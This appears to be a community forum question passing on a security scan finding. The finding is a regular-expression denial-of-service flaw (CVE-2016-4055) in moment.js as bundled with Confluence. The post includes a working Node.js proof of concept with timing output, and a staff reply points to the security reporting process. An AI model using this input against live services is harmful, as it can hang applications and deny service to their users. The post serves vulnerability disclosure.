Confluence Security Weakness Sonatype CWE: 400


Our security team performed a security scan on Confluence 6.21 and found a security issue; the details are provided below. We can only adopt it for production use if that risk is addressed by Atlassian. Our procurement department is waiting for us to obtain a mitigating solution for this issue before they procure Confluence.


Severity Sonatype CVSS 3.0: 7.5

Weakness Sonatype CWE: 400

Explanation: The moment package is vulnerable to a Regular Expression Denial of Service (ReDoS). The moment.duration() method in moment.js contains a regular expression, used to determine if an input is of the ASP.NET date format, that can cause an application to hang. The aspNetRegex, the variable's name in the code, causes very slow processing of exponentially long repetitive sequences leading to a Denial of Service (DoS) due to excessive resource consumption. A remote attacker could exploit this flaw by supplying a specially crafted request URL containing long repetitive sequences to cause the denial of service (DoS).

Proof of concept:

var moment = require('moment');

// Build a string of len + 1 copies of chr (the original loop bound is <=, kept as-is).
var genstr = function (len, chr) {
    var result = "";
    for (var i = 0; i <= len; i++) {
        result = result + chr;
    }
    return result;
};

// Feed moment.duration() ever-longer runs of digits and time each call.
// In the original, the loop counter i was an implicit global shared by both
// loops, which is why COUNT advances by 10001 instead of 10000 in the results.
for (var i = 20000; i <= 10000000; i = i + 10000) {
    console.log("COUNT: " + i);
    var str = '-' + genstr(i, '1');
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    moment.duration(str);
    var end = process.hrtime(start);
    console.log(end);
}

Results:

$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]

Reference Link:

Note: CVE-2016-4055 has been assigned to this vulnerability.

Detection: The application is vulnerable by using this package.

Recommendation: We recommend upgrading to a version of this component that is not vulnerable to this specific issue.

Categories: Data

Root Cause moment : 2.5.0

Advisories Project:  

1 answer

0 votes
Ann Worley Atlassian Team Aug 21, 2017

Our security team has asked me to direct you to How to Report a Security Issue.

It would be great if you could follow up on this forum to let the Community know the result.
